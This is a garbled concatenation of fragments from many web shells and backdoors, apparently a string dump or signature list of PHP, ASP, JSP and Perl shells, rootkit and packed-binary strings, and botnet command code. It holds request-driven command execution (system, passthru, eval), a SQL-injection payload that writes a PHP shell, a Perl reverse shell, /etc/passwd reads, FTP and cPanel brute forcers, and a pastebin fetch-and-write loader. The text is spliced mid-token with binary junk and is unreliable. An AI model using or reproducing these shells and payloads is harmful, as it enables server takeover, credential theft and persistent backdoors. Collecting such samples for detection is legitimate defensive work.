$liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if 